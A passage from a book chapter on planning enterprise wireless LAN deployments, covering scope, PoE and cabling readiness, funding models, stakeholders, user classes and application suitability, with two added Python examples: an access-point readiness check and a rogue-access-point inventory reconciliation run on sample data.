about understanding and addressing the larger context in which the project takes place. As such, the
key factors that need to be considered include but are not limited to the following:
Breadth and scope of the deployment, including
- Deployment scope
- Infrastructure readiness
- Environmental considerations
- Regulatory requirements or restrictions
Deployment funding strategies, including
- Centrally funded
- Group funded
- Client funded
- Subscription funded
By clearly identifying and defining your position on these issues, you will provide a more targeted
solution, avoid scope creep, achieve swifter deployment, and preempt many potential problems. Indeed,
many technology deployments fail because the planner or business decision maker failed to identify and
subsequently preemptively address these fundamental challenges.
The next sections examine each of these key factors in turn.

Breadth and Scope of Deployment


One of the first sets of decisions you should make when preparing to deploy an enterprise-class wireless
LAN relates to the breadth and scope of the deployment. You need to decide where you are going to
deploy, whether your existing infrastructure is ready to support the WLAN, and what local and
environmental regulations you must address.

Deployment Scope
You need to determine how large a footprint you want your WLAN to have. The business rationale you
identify (as described in Chapter 2) will certainly assist you in this process. However, it is strongly
recommended that you document as accurately as possible the breadth and scope of your deployment.
Doing so ensures that you avoid installing the WLAN in areas where it is unnecessary or would provide
limited benefits, and conversely ensures that you cover all areas in which WLAN connectivity is both
required and beneficial to your organization. You may wish to identify early on whether there are specific
business considerations with regards to where you will deploy. Options for deployment include the
following:
All office environments
HQ building only
Small/medium satellite offices
New offices only
Greenfield site
Draw up a list of all buildings/sites/floors where you want to deploy independently of the business driver
(secondary network, complementary network, and so on). This will also assist you in your budget and
project planning, help you to create a prioritized deployment list, and help you to identify possible pilot
sites.

Infrastructure Readiness
A key focal point should be the infrastructure requirements that a WLAN deployment presents. To assist
you in this endeavor, you must consider typical network architecture models. Most large-scale networks
are built on a hierarchical model. Typically, there are three "layers" to these networks, as shown in Table
3-1.

Table 3-1. Hierarchical Network Layers

Layer: Core
Explanation: Provides fast links between sites or campus locations. Focus is high-speed switching and
routing of data. The core layer is typically the organization's wide-area network (WAN) that links each
site or campus.

Layer: Distribution
Explanation: The distribution layer functions as an aggregation point and conventionally provides
higher-level, more intelligent network services such as security policies, traffic shaping, content
routing, and so on. The distribution layer typically links buildings or sites on one campus. It should be
noted that in some small to medium organizations, the core and distribution layers are collapsed into
one.

Layer: Access/Edge
Explanation: The access or edge layer provides network connectivity to your users or workgroups. The
network ports into which PCs, servers, printers, and so on are connected form the "entry points" into
the access layer.

Figure 3-2 illustrates the network layers.

Figure 3-2. Hierarchical Network Model



In a typical wired network, your users connect via the access layer switches, which are sometimes
known as workgroup switches. In a WLAN, however, your users connect to the network via the wireless
access points. Access points are considered edge devices, and they lie within the access layer, as you
can see in Figure 3-3.

Figure 3-3. Access Layer

Note
Don't confuse the terms "access layer" and "access points." The access layer is a conceptual
term used to describe the edge devices that provide connectivity to your end users and
workstations. Access points are the physical devices that provide wireless connectivity. They
are analogous to workgroup switches. Access points and workgroup switches are considered to
lie within the access layer, because they are "edge devices" that provide entry into the
network.

These concepts are important because when you deploy a WLAN, you are adding devices into your
access layer and connecting them directly to your workgroup switches. Therefore, you must ensure that
your workgroup switches have sufficient capacity for these access points. Typically they require a
network port, power, and console access.

Connectivity
Because each access point requires an Ethernet port for connectivity, you must ensure that your network
switches have sufficient port capacity to attach the AP to the rest of the network. Typically, this does not
pose a problem in greenfield deployments. When you deploy your WLAN in an established or mature
networking environment, however, port capacity becomes a significant consideration; if the capacity is
not there, you must budget accordingly for additional equipment. In addition, you should ensure that
your Ethernet switches support at least 100BASE-T, as all the current WLAN standards (802.11a,
802.11b, and 802.11g) provide an aggregate nominal throughput of between 11 Mbps and 54 Mbps.
Finally, you will have to ensure that the access point locations are within the cabling distance limit for
the employed LAN technology. For example, the maximum transmission distance for 100BASE-T is 100
meters.

In summary, to ensure that your access points can establish connectivity, answer the following
questions:
Do you have sufficient Ethernet ports, or do you require additional switches?
Do your switches provide 100BASE-T or higher?
Is the cabling distance within defined limits?

Power
Electronic equipment requires electrical power. Generally speaking, you can power access points in two
ways:
Directly from AC mains power where the access points are located
By providing power over the Ethernet cable
Powering the access points via AC is straightforward but requires that you provide AC outlets in the
vicinity of the access point. This is often an expensive exercise that requires the use of certified electrical
engineers, which can add significant cost and delays to your projects.
Powering the access points via the Ethernet cables is achieved via Power over Ethernet (PoE). This
technology has been standardized as IEEE 802.3af and employs a previously unused pair of wires in
category 5 (or better) cables to provide power to a device. PoE is popular because it avoids the need to
install expensive additional power cables at each location and helps reduce costs.
When determining your power requirements, answer the following questions:
Do you wish to use PoE?
Do your existing Ethernet switches support PoE?
If your existing Ethernet switches do not support PoE, do you want to upgrade your switches or use
alternative power injectors instead?

Console Access
Many enterprises provide console access, also known as out of band management, to their network
equipment for support and management purposes. You should account for providing console-port access
if required or desired. Note that not all access points support console access. If this is a requirement or
standard for your organization, you should ensure that the access point make and model under
consideration supports console access, and that your wired infrastructure has sufficient capacity to
provide it.
When planning your WLAN, answer the following questions:
Do you wish to provide console access?
Do you have sufficient console server ports?
Are your console servers within cabling limits?
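The three question lists above (connectivity, power, and console access) are one readiness procedure, so
the following added example, which is not code from the book or from any vendor, turns them into a
per-access-point check that a planner can run over an inventory. It assumes you can tabulate, per
workgroup switch, the free ports, port speed, and PoE capability, and, per planned access point, the
switch it patches into and the cable runs. The switch inventory and AP plan in sample_report() are
constructed sample data, not a real site; the console cable limit is a placeholder that you must set from
the console cabling you actually use.

```python
"""Infrastructure readiness check for planned access point (AP) locations.

Added example (not from the book): it turns the connectivity, power and
console questions in the text into a per-AP check. The switch inventory and
AP plan in sample_report() are constructed sample data, not a real site.
"""
from dataclasses import dataclass

MAX_CABLE_RUN_M = 100        # 100BASE-T distance limit quoted in the text
MIN_PORT_SPEED_MBPS = 100    # switches should offer 100BASE-T or better
CONSOLE_RUN_LIMIT_M = 100    # placeholder assumption: set from your console cabling


@dataclass
class Switch:
    name: str
    free_ports: int          # unused Ethernet ports available for APs
    port_speed_mbps: int     # 10, 100 or 1000
    poe: bool                # does the switch supply Power over Ethernet?


@dataclass
class PlannedAP:
    name: str
    switch: str              # name of the workgroup switch it will patch into
    cable_run_m: float       # planned cable length from switch to AP
    console_run_m: float     # planned cable length from console server to AP
    wants_console: bool = True


def check_readiness(switches, aps, console_ports_free, use_poe=True):
    """Return {ap_name: [issue, ...]}; an empty list means the AP is ready.

    Ports are consumed in plan order, so a switch that is short of ports
    flags the later APs assigned to it rather than the earlier ones.
    """
    by_name = {s.name: s for s in switches}
    ports_left = {s.name: s.free_ports for s in switches}
    console_left = console_ports_free
    report = {}
    for ap in aps:
        issues = []
        sw = by_name.get(ap.switch)
        if sw is None:
            report[ap.name] = [f"unknown switch {ap.switch!r}"]
            continue
        # Connectivity: port capacity, port speed and cable distance
        if ports_left[sw.name] > 0:
            ports_left[sw.name] -= 1
        else:
            issues.append("no free Ethernet port; budget for an additional switch")
        if sw.port_speed_mbps < MIN_PORT_SPEED_MBPS:
            issues.append(f"port speed {sw.port_speed_mbps} Mbps is below 100BASE-T")
        if ap.cable_run_m > MAX_CABLE_RUN_M:
            issues.append(f"cable run {ap.cable_run_m:g} m exceeds {MAX_CABLE_RUN_M} m limit")
        # Power: PoE from the switch, or else a power injector / AC outlet
        if use_poe and not sw.poe:
            issues.append("switch lacks PoE; upgrade the switch or use a power injector")
        # Console (out-of-band) access: console server port and its cable limit
        if ap.wants_console:
            if console_left > 0:
                console_left -= 1
            else:
                issues.append("no free console server port")
            if ap.console_run_m > CONSOLE_RUN_LIMIT_M:
                issues.append(f"console cable run {ap.console_run_m:g} m exceeds limit")
        report[ap.name] = issues
    return report


def sample_report():
    """Run the check over constructed sample data (not a real site)."""
    switches = [
        Switch("sw-floor1", free_ports=2, port_speed_mbps=1000, poe=True),
        Switch("sw-floor2", free_ports=1, port_speed_mbps=100, poe=False),
    ]
    aps = [
        PlannedAP("ap-101", "sw-floor1", cable_run_m=60, console_run_m=70),
        PlannedAP("ap-102", "sw-floor1", cable_run_m=120, console_run_m=90),
        PlannedAP("ap-201", "sw-floor2", cable_run_m=40, console_run_m=45),
        PlannedAP("ap-202", "sw-floor2", cable_run_m=50, console_run_m=55),
    ]
    return check_readiness(switches, aps, console_ports_free=3)


if __name__ == "__main__":
    for ap_name, issues in sample_report().items():
        print(ap_name, "ready" if not issues else "; ".join(issues))
```

In the sample plan, ap-102 fails only on cable distance, ap-201 only on PoE, and ap-202 collects three
issues (no port, no PoE, no console server port), which is the per-location budget list the text asks you
to prepare.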

Environmental Considerations
Many enterprises decide to physically locate the access points in the interstitial space between the ceiling
tiles and roof. This plenum area has strict fire regulations associated with it in most countries. In the
United States, for example, all equipment and cabling installed in the plenum space must be
"plenum-rated," a term denoting that it is fire-resistant.
Certain environments have stringent controls on what electrical equipment can be deployed in other
areas. Examples include government or military installations, hazardous environments (mining,
petroleum, gas, mineral exploitation, and so on), certain manufacturing locations (munitions,
"clean-room" environments, and so on), and many healthcare-related buildings or campuses. In these
circumstances, the electrical equipment must be deemed "intrinsically safe," a term denoting that the
equipment does not create electrical interference or even very small electromagnetic discharges. Most
electrical equipment, including access points, is not "intrinsically safe" and can therefore create very
small electromagnetic discharges or interference. To address these stringent environmental controls,
access points can be installed in special shielding containers. In the United States, these are called
National Electrical Manufacturers Association (NEMA) enclosures. (Further information on NEMA and
NEMA enclosures can be found at http://www.nema.org/prod/be/enclosures/.)
In the United States, there are also national health and safety regulations to be considered, and local
and national building standards. It is important for you to follow due diligence on potential environment
or safety standard issues that are specific to your organization's context. Be sure to investigate and
understand your obligations and ensure that your equipment complies with all relevant standards. The
use of an experienced or professional deployment team will help in this area. Enterprises that work in
such environments or that have equipment sensitive to environmental factors often have a safety or
standards officer who can approve any wireless LAN installations or at least provide guidance. Ensure
that they are represented in the project.
Safety and standards compliance are not the only environmental topics that can impact your planning
phase. Simple issues such as ruggedness or waterproofing might also need to be considered. This is
especially the case when you might be deploying wireless access points outdoors (in a university
campus, for example).

Regulatory Restrictions or Requirements


As mentioned in Chapter 1, the regulations that apply to the use of 2.4-GHz and 5-GHz frequency
ranges are not the same all over the world. At this stage, it is sufficient to note that you must take local
and national regulations into account and plan accordingly. This is especially important if you are
considering a large, transnational or global deployment because you might need to purchase different
models for different countries.

Deployment Funding Strategies

There are many funding strategies for deploying wireless in an organization, including the following:
Centrally funded
Group funded
Client funded
Subscription funded
This section describes these common strategies along with their advantages and disadvantages. You
learn more about funding strategies in Chapter 6, "Wireless LAN Deployment Considerations."

Centrally Funded Deployment


Centrally funded is perhaps the most common funding strategy. The entire cost is absorbed by a single
entity; this can be the IT department, Finance, or the group responsible for business operations. In most
small to medium deployments, this is the only model used.
Advantages of centrally funded deployment include
Full visibility of program cost
Ease of management
Simplified cost and budgetary control
Disadvantages of centrally funded deployment include
Requires entire project to be funded up front
Requires careful monitoring and sometimes dedicated finance staff

Group-Funded Deployment
Group-funded deployment strategies are those where a division, department, or sometimes regional
section of an enterprise funds the deployment from its own budget. It either engages external
professional consultants to design and deploy the solution or uses the organization's existing IT
department in a "professional services" model.
Advantages of group-funded deployment include the following:
Ensures that each group/division funds its own deployment
Tends to encourage financial prudence on the part of groups requesting WLAN services
Avoids "rogue deployments" where groups self-fund and manage their own solution

Disadvantages of group-funded deployment include the following:
Is more complex than centrally funded model
Requires each group/division to control its own budget
Requires each group/division to manage its own program cost
Can sometimes result in different groups funding competing solutions
Does not necessarily require each group/division to follow corporate or organizational standards

Client-Funded Deployment
A client-funded strategy is simply one whereby the IT department of the enterprise is responsible for
installing and managing the deployment but utilizes a charge-back mechanism to the clients (usually
other departments or divisions) to fund the installation. This strategy is usually adopted with a clear
policy direction that ensures your IT department is the only group approved for deploying wireless
networks. This ensures that you maintain a consistent architecture, a standard design and scope of work
(equipment, manufacturer and model), wireless security standards, and a common support plan.
Furthermore, it prevents several different departments from proceeding with their own installations that
might not be compliant with your internal security and procurement policies.
Client-funded deployments are usually based upon an installation charge per AP or user, followed by an
ongoing support cost.
Advantages of client-funded deployment include
Ensures common architecture, standards, policies, and IT security strategy
Avoids "rogue deployments" where groups self-fund and manage their own solution
Helps control cost
Encourages financial prudence, because each group must fund deployment from its own budget
Disadvantages of client-funded deployment include
Is more complex to manage than centrally funded model
Requires each group/division to control its own budget
Requires each group/division to manage its own program cost
Tends to result in staggered deployments, or "patchy" WLAN coverage
Can cause user dissatisfaction when one group or area has WLAN coverage but others do not

Subscription-Funded Deployment
The subscription-based deployment strategy is also known as "pay as you go." In this model, the users
or user groups pay a service fee for wireless network access. The subscription model ensures that you
not only recover the costs associated with the service deployment but also recuperate ongoing support
and maintenance costs.
This model is less common in most standard enterprise deployments but popular in environments where
you have many different user types. Universities are a good example. The provision of wireless network
access can be considered an added value service that the student body pays for on a per-user or
per-class basis.
Advantages of subscription-funded deployment include the following:
Ensures that ongoing support costs are recovered from end users/groups
Reduces unnecessary or under-utilized deployments
Disadvantages of subscription-funded deployment include the following:
Requires complex financial models and charge-back mechanisms
Tends to limit breadth of deployment to those who can spare budget

Planning
This section addresses the planning phase of your deployment.

Note
This book is not a project management guide. Many large enterprises already have an official
project lifecycle or have adopted one of the national or international standards such as PRINCE2
(http://www.ogc.gov.uk/prince2/), BS6079 (http://www.bsiglobal.com/index.xalter), or the Project
Management Institute (PMI) Project Management Body of Knowledge (PMBOK) (www.pmi.org).

If your enterprise or organization has a predefined project lifecycle or methodology, follow it. However,
for those organizations that do not have a formal project methodology, and even for those that have
standards in place, this section makes some general recommendations.
We recommend that you address, at a very minimum, the following key elements of your project:
Identify and obtain buy-in from the project stakeholders. These can include
- Project sponsor
- Project board
- Program team
- Program manager
- Project tracks
Segment and classify the WLAN user community. User considerations include
- User classes
- Primary users
- Secondary users
- Other users
Determine the impact on the application portfolio. Deliberations should include
- The main or typical application base you want to use on the WLAN
- Application characteristics
- The portability of the application portfolio and usage pattern to a WLAN environment
Develop a scalable architecture that addresses the following:
- The architecture's ability to grow easily to support additional users and groups
- Single points of failure
- Common architecture that can be replicated easily across all sites
Define your security strategy that, at a minimum, addresses
- Treating the wireless network as "trusted" or "untrusted"
- Using wireless security policies
- Dealing with rogue access points
Construct a high-level program plan. We recommend that you
- Estimate resource requirements
- Estimate budgetary requirements
- Produce project/program plan
- Follow your internal project lifecycle
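The security strategy item above lists "dealing with rogue access points" without saying what the first
operational step looks like. The following added example, which is not code from the book, shows the
simplest defensive building block: reconciling what a wireless survey or wireless IDS observes against
the inventory of sanctioned access points, so that an unknown BSSID advertising one of your corporate
SSIDs is surfaced to the information security track for investigation. It assumes you keep an authorized
BSSID list and can export scan records as BSSID/SSID/channel/signal; the inventory, SSIDs, signal
threshold, and scan records in sample_reconciliation() are all constructed, not real.

```python
"""Reconcile observed wireless access points against an authorized inventory.

Added example (not from the book). Assumes an inventory of sanctioned AP
BSSIDs and a scan feed of BSSID/SSID/channel/signal records from whatever
survey tool or wireless IDS you use. All records below are constructed.
"""
from dataclasses import dataclass

# Signal level at or above which an unknown AP is probably on your premises
# rather than in a neighboring building. Assumed threshold; tune per site.
ON_PREMISES_RSSI_DBM = -60


@dataclass(frozen=True)
class ObservedAP:
    bssid: str
    ssid: str
    channel: int
    rssi_dbm: int


def normalize_bssid(bssid):
    """Canonical form so 00-11-22-AA-BB-CC and 00:11:22:aa:bb:cc compare equal."""
    return bssid.strip().lower().replace("-", ":")


def reconcile(authorized_bssids, corporate_ssids, observed):
    """Sort a scan into categories for the security and operations teams.

    known          : BSSID is in the sanctioned inventory
    suspected_rogue: unknown BSSID advertising one of your corporate SSIDs
                     (an impersonation or an unsanctioned self-installed AP)
    unknown_strong : unknown BSSID, non-corporate SSID, but strong signal,
                     so likely inside your building (e.g. a group-funded AP)
    neighbor       : unknown BSSID, non-corporate SSID, weak signal
    """
    authorized = {normalize_bssid(b) for b in authorized_bssids}
    corporate = set(corporate_ssids)
    result = {"known": [], "suspected_rogue": [], "unknown_strong": [], "neighbor": []}
    for ap in observed:
        bssid = normalize_bssid(ap.bssid)
        if bssid in authorized:
            result["known"].append(bssid)
        elif ap.ssid in corporate:
            result["suspected_rogue"].append(bssid)
        elif ap.rssi_dbm >= ON_PREMISES_RSSI_DBM:
            result["unknown_strong"].append(bssid)
        else:
            result["neighbor"].append(bssid)
    return {k: sorted(v) for k, v in result.items()}


def sample_reconciliation():
    """Run reconcile() over constructed sample data (not a real site)."""
    authorized = ["00-11-22-33-44-01", "00-11-22-33-44-02"]
    corporate_ssids = {"CORP-WLAN", "CORP-GUEST"}
    scan = [
        ObservedAP("00:11:22:33:44:01", "CORP-WLAN", 1, -48),
        ObservedAP("00:11:22:33:44:02", "CORP-GUEST", 6, -55),
        ObservedAP("AA:BB:CC:DD:EE:01", "CORP-WLAN", 11, -50),    # unknown, corporate SSID
        ObservedAP("AA:BB:CC:DD:EE:02", "home-router", 6, -45),   # unknown, strong signal
        ObservedAP("AA:BB:CC:DD:EE:03", "CafeFreeWifi", 1, -82),  # unknown, weak signal
    ]
    return reconcile(authorized, corporate_ssids, scan)


if __name__ == "__main__":
    for category, bssids in sample_reconciliation().items():
        print(f"{category:16s} {', '.join(bssids) or '-'}")
```

The categories map onto the planning list: "suspected_rogue" is the case your security policy must say
how to handle, and "unknown_strong" is the typical signature of the self-funded "rogue deployments"
that the funding sections warn about. Anything an inventory comparison cannot settle (a strong unknown
AP, a corporate SSID on an unknown BSSID) is handed to the information security track for
investigation rather than acted on automatically.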

Note
The goal is to assist you in defining your business case, to prepare and plan your deployment,
and to provide guidance on how to implement, manage, secure, and optimize your WLAN.
If you are unfamiliar with standard project management methodologies and project lifecycles,
we highly recommend you engage or appoint a professional or dedicated project manager to
assist you in your deployment.

Project Stakeholders

An important step is to clearly document the project sponsor and stakeholders and how they shall
manage and monitor the project. This helps put in place a clear reporting chain and follows established
business processes and project methodologies in most large enterprises.

Project Sponsor
Before you commence, you need a project sponsor. This is usually a senior executive within the
organization who either has made the decision to proceed with the deployment or has had the program
assigned to him. The project sponsor is by definition a stakeholder who sits on the project board (if one
exists).

Project Board
The project board is a committee made up of senior department or group heads that have a vested
interest in the program's success. Along with the sponsor, these individuals are sometimes also known
as stakeholders. They can include the likes of Finance Director/CFO, IT Director/CIO, Business
Operations Manager, and so on. The project stakeholders usually also include a representative of the end
users and senior members of the IT department. The project stakeholders/project board should meet
regularly to monitor the progress of the program, note deviances, and agree on remediation if
necessary.

Program Team
After you have identified your project sponsor and formulated a list of stakeholders, you need to create a
project or program team. In its Project Management Body of Knowledge (PMBOK), PMI defines a project
as "a temporary endeavor undertaken to create a unique product or service." A program is simply a
collection of interrelated projects. Whether your deployment is considered a project or a program really
depends upon its size. Most enterprise-class WLAN deployments are large enough to contain several
project tracks, which means that planning your deployment qualifies as a program. For smaller
deployments, simply collapse these steps into a single project.

Program Manager
A program and its team are usually led by a program manager. The program manager has ultimate
responsibility for fulfilling the program goals and managing the program's operations. He typically
reports to the stakeholders and sits on the project board. Program managers are responsible for
reporting on the program's progress and deviations and, most importantly, ensuring that each
constituent project is completed on time, on budget, and in accordance with the overall program plan.
Each project has a project manager responsible for its detailed management. Sometimes, especially on
smaller programs or where there are resourcing problems, the program manager may also act as a
project manager. All project managers usually also report to the program manager.
A program manager is critical to a successful delivery of your solution. Ideally, the program manager
should be familiar not only with wireless and/or networking technologies, which facilitates collaboration
with the technical team, but also with your organization.

Project Tracks
Most large programs are broken down into several projects or project tracks. Each project is usually
managed by a project manager. Table 3-2 shows examples of typical project tracks and their
responsibilities.

Table 3-2. Example Project Tracks

Project track: Design team
Responsibility: Solutions architecture
Comment: The design team defines and designs the technical architecture of your solution. This is
probably the most important track in the early stages of your project.

Project track: Network operations
Responsibility: Ongoing
Comment: The network operations team includes those responsible for the ongoing support and
maintenance of the wireless LAN infrastructure. In some organizations, they are the same as the design
team.

Project track: Frontline support
Responsibility: Helpdesk, desktop support
Comment: The frontline support team is the first point of contact for your users. It is important to
engage your support organization during your program, because any WLAN deployment will have an
impact upon your end users.

Project track: Finance
Responsibility: Project finance, budgetary controls
Comment: The finance organization is responsible for managing the project budget and ensuring
financial prudence. Its engagement can range from a finance representative assigned responsibility for
the project all the way to a full team of corporate finance analysts.

Project track: Information security
Responsibility: Security, standards, and policy compliance
Comment: This team or individual is usually responsible for defining the organization's security posture,
policies, and standards.

Project track: Workplace resources
Responsibility: Cabling, power, occupational health and safety, and so on
Comment: Workplace resources is a term often used to describe the group responsible for workplace and
environmental issues, such as cabling, power, and OHS.

Project track: Vendor management
Responsibility: External vendor engagement, contracts, selection, SLAs, and so on
Comment: Many large organizations have dedicated teams who manage external vendors and third-party
contractors.

Note
This list is not exhaustive but simply indicative of several possible groups that should be
represented in the program team.

Users
It is important to understand your users so that you can ensure that your WLAN design satisfies their
requirements. One common approach is to categorize your users into different types or classes and then
identify your primary, secondary, and other user types.

User Classes
When considering your user base, it is helpful to define various classes of users who share common
attributes. These profiles are based on their typical requirements. This includes their primary
applications, degree of mobility, bandwidth and latency restrictions, level of security, and typical hours
of operation. Note that a user doesn't necessarily need to be an individual. It can also include printers,
servers, or automation equipment. It's also important to note that user classes should include
anticipated users/devices. Many WLAN deployments are based upon providing network connectivity for
users or devices that have not been implemented yet; wireless voice handsets are a prime example.
Identifying the various classes and their respective characteristics helps ensure that you design your
WLAN to meet their specific requirements. For example, standard users have different security
requirements from guest users.
The following sections and tables describe different types of users.

Standard User Class


The standard user class is the most common. It covers the common office user, generally outfitted with
a laptop or mobile data device (PDA, SmartPhone, and so on). The traffic created by this class is
typically identical to normal daily network traffic, and these users can happily coexist with other users in
that class within the same WLAN cell. Some standard class devices may require higher levels of
bandwidth, because they create streaming voice or video traffic.

Description: Standard network user/device in semi-fixed location
Characteristic:
- Typically has a fixed work location or desk
- User or device may roam periodically
Requirements:
- Access to the enterprise network and applications
- User may roam periodically
- Some standard user class devices may need high-bandwidth support (wireless voice and video, for
example)
Examples:
- Normal enterprise laptop user
- Wireless printer
- Wireless video camera
- Robotic manufacturing device
Typical applications:
- Standard office productivity applications
- Web browsing
- E-mail, calendaring, and so on

Mobile User Class


The mobile user class covers those users in your organization who are on the move for the majority of
their time. They may have a desk and fixed telephone line, but mobility is key to completing their
primary job function. As such, they are often equipped with application-specific devices (ASDs), such as
asset tracking bar-code readers, PDAs, and standard laptops.
This class also includes devices and is not limited to individuals. For example, a mobile user class device
could include electric carts with an integral PDA/laptop such as those used in some airports.

Description: User/device that is constantly on the move within a single location
Characteristic:
- Typically doesn't have a fixed work location or desk
- This class is mobile across the office/campus environment
Requirements:
- Access to the enterprise network and applications
- Roaming from WLAN cell to cell required
- Extensive (or even ubiquitous) coverage preferred
Examples:
- Doctor with PDA
- University lecturer with laptop
- Shipping clerk with bar-code reader
- Desktop support engineer with PDA/laptop
- Forklift truck with location-based services
- Automated stock delivery cart with location/capacity sensors
Typical applications:
- Standard office productivity applications
- Web browsing
- E-mail and calendaring
- Vertical applications (POS, telemetry, manufacturing services, and so on)

Roaming User Class


The roaming user class is typically limited to individuals (not devices) who are constantly on the move,
not only within one location or office, but across multiple locations. This class is also known as road
warriors. In many regards they are similar to the mobile user class, with the added requirements of
seamless access or "common user experience" at any location.

Description: User who regularly moves from location to location (office or campus)
Characteristic:
- Typically has no fixed location and can "appear" at any office
- Roaming user types are most likely individuals (not devices)
Requirements:
- Access to the enterprise network and applications
- Consistent network architecture from location to location
- Support for authentication across locations
Examples:
- Road warrior user who moves from office to office
- Traveling salesperson
Typical applications:
- Standard office productivity applications
- Web browsing
- E-mail and calendaring

Hot-Desk User Class


The hot-desk user class is becoming more common. This class covers users and devices that move from
location to location periodically either on a day-to-day basis or throughout the day. Similar to the
standard user class, in that they typically require access to everyday network resources, their defining
characteristic is that they might remain static for a short period but subsequently move on to another
location later. This class includes students in educational organizations and devices such as the mobile
check-in desks found in many airports or convention centers.

Description: User who arrives to work each day and chooses a different work location or desk each time
Characteristic: Typically doesn't have a fixed work location or desk; however, this user type tends to be
limited to one deployment area (that is, office or campus environment)
Requirements:
- Can access the enterprise network and applications
- May require secure or segmented access to the Internet
- May require separate authentication mechanism to standard user class
Examples:
- Call center employee
- Student
Typical applications:
- Standard office productivity applications
- Web browsing
- E-mail and calendaring
- Educational database applications
- Call center management applications

Guest User Class


The guest user class covers the users (rarely devices) that require sporadic network access. Usually they
require Internet access only, and their access is typically limited to that; that is, they are not provided
with enterprise network connectivity. Many corporations now provide guest wireless access to visitors or
temporary users such as contractors or conference attendees. Access is often controlled or monitored
and may require the user to accept legal and acceptable usage policies. In-room Internet access for
hotel guests is a prime example of the guest user class.

Description: Guest users
Characteristic: Not a member of the organization
Requirements:
- Can usually access the Internet
- May require authentication or access control
- May have access limited by throughput and/or time of day
- May not support all applications
- Typically may use VPN for access to their own network (and may therefore require certain security
configuration on your network)
Examples:
- Temporary contractors
- Visitors to your enterprise to whom you wish to provide Internet access
- "Customers" at Internet cafes
- Hotel and airport visitors
Typical applications:
- Web browsing
- VPN connectivity to remote or "home" networks

Note that these classifications are not necessarily standard across the industry. These should be
considered general descriptive terms. Some companies may not have hot-desk users or may consider
them identical to mobile users. Additionally, your organization may include many different user types,
but the WLAN is aimed at providing wireless access to only some of them. For example, a university may
choose to deploy a wireless network for its security staff (mobile users) but not its student body
(hot-desk users). By clearly identifying the types of users in your organization, you can more easily
design a network to address your specific goals. These can include providing network access to them all
or only to a limited subset of them.
After you have classified your user types, you can proceed with identifying your primary, secondary, and
even your tertiary users.

Primary Users
After you identify the user classes within your organization, you should clearly define who the primary
target audience is for the WLAN. You may have defined several different classes of users but aim to
provide wireless access to only one class. This will have an effect on the breadth and scope of your
deployment, the architecture, and the cost.

Secondary Users
Secondary users are those who can use the mobility, productivity, and connectivity benefits of the
WLAN, even though they were not the primary target. An example could be mobile workers in a
manufacturing environment, where wireless was originally installed to provide connectivity to factory
equipment.

Other Users
Some organizations may choose to provide wireless access to guest users as an incidental benefit or
amenity. Although it may not have been a specific project goal or success criterion, fringe benefits can
be realized by extending the availability of your WLAN to irregular users.

Impact on Application Portfolio


Wireless networks are slower than conventional wired networks. Today's wired networks typically
provide 100 Mbps to 1000 Mbps of dedicated bandwidth per connection. Conversely, today's fastest
WLANs offer only up to (and often less than) 54 Mbps that is typically shared among several users.

However, as mentioned in Chapter 1, the value of WLANs is not based on speed, but on mobility. As the
business decision maker, you must consider the impacts of wireless networks on your existing
applications. Most applications will work well, and your workforce will benefit from the added mobility
provided by wireless network access. Yet there may be some applications that are so sensitive to
bandwidth limitations and lag that their performance is adversely impacted. Remember, a WLAN is a
"shared medium" unlike the typical switched wired network. All the users in a particular cell must share
the bandwidth, and as such, the amount of bandwidth available to individual users is considerably less
than that provided by a wired LAN. Furthermore, the more users there are per cell, the less bandwidth
that is available to each user. As such, some applications might not work satisfactorily on your wireless
network.
An application matrix will help you decide which applications are suitable for wireless networking. A
simple five-step process will help you categorize your applications and avoid such an outcome:
Step 1. Identify your applications.
Step 2. Identify application bandwidth requirements.
Step 3. Identify sensitive applications.
Step 4. Consider application/location interdependencies.
Step 5. Produce wireless application matrix.

The following sections describe additional points to consider when determining the impact of wireless on
your application portfolio.

The Main Application Base You Want to Use on the WLAN


Applications can be grouped into generic categories as follows:
Standard business applications Internet, e-mail, calendaring, word processing, spreadsheets,
and so on.
Vertical "low bandwidth" applications Point of Sale (POS), telemetry, bar-code readers, and so
on.
Vertical "high bandwidth" applications Manufacturing, engineering, CAD/CAM, medical
imaging, and so on.
Streaming applications Video and voice.
Database and business applications Enterprise Resource Planning (ERP), Customer Relationship
Management (CRM), supply chain management, and so on.
This list is not exhaustive, but it is indicative of the application types. Careful consideration is required
regarding the application specific characteristics, as well as the environment to which the applications
are to be extended by means of WLANs. These considerations are discussed next.

Application Characteristics
Identifying the characteristics, such as bandwidth required by each application or application mix, is
important. Some applications may require consistent or sustained amounts of high bandwidth. If you
choose to deploy a WLAN in conjunction with wireless voice services, for example, you must consider the
minimum amount of bandwidth required by your voice application. Wireless video cameras are also
typical of applications that require a significant or dedicated amount of bandwidth and minimal jitter.
Next, identify which applications are susceptible to the characteristics of wireless LANs. Some
applications may be susceptible to the "lag" introduced into WLANs when the user roams from cell to
cell, for example. This can sometimes add several hundred milliseconds of lag to a session. Most
applications can tolerate minor network-related issues like this, but some (including wireless voice, for
example) will be negatively impacted.

The Portability of the Application Portfolio and Usage Pattern to a WLAN Environment
Consider the physical location of users and the mix of applications they use. If you expect a high number
of users accessing high-bandwidth applications at the same time in the same location, you may
experience potential problems. For example, if you wish to share your WLAN between normal office
applications and wireless voice, you may find that you experience voice quality problems if too many
data users are "online" at once. You can address this issue with careful radio cell design or with the use
of the higher-bandwidth WLAN standards (802.11g and 802.11a). Additionally, you may wish to put
limits on the size of your cells to ensure that each user can get enough bandwidth.
The use of wireless quality of service (QoS) controls should not be overlooked. Several equipment
manufacturers have implemented their own proprietary QoS features (that usually only work with their
own equipment and client devices), or you may opt for solutions like that offered by the Cisco Client
Extensions (CCX) program, which though proprietary is open for adoption by any manufacturer. Finally,
there is the WiFi Multimedia (WMM) standard defined by the WiFi Alliance.
Once you have completed this analysis, you can categorize your applications into a sliding scale or
application matrix. At one end will be the normal applications that work very well on a wireless network;
effectively, they are network agnostic. At the other end will be applications that are not suitable for
wireless users. Based upon this categorization, you can flag certain applications as unsuitable or not
recommended for wireless use. This will ensure that your support organization and user base are fully
informed.
Table 3-3 shows a sample application matrix. In this example, certain policy decisions are represented,
such as the decision not to support Internet traffic on the WLAN. In your deployment, the entries in the
application matrix will be different.

Table 3-3. Sample Application Matrix

Application / Service     | User Class                   | Bandwidth Sensitive? | Lag Sensitive? | Wireless Suitability? | Supported on Wireless?
--------------------------|------------------------------|----------------------|----------------|-----------------------|-----------------------
Office applications       | Primary, Secondary           | No                   | No             | Yes                   | Yes
E-mail                    | Primary, Secondary, Tertiary | No                   | No             | Yes                   | Yes
Wireless video cameras    | Primary                      | No                   | Yes            | Possible[1]           | Yes
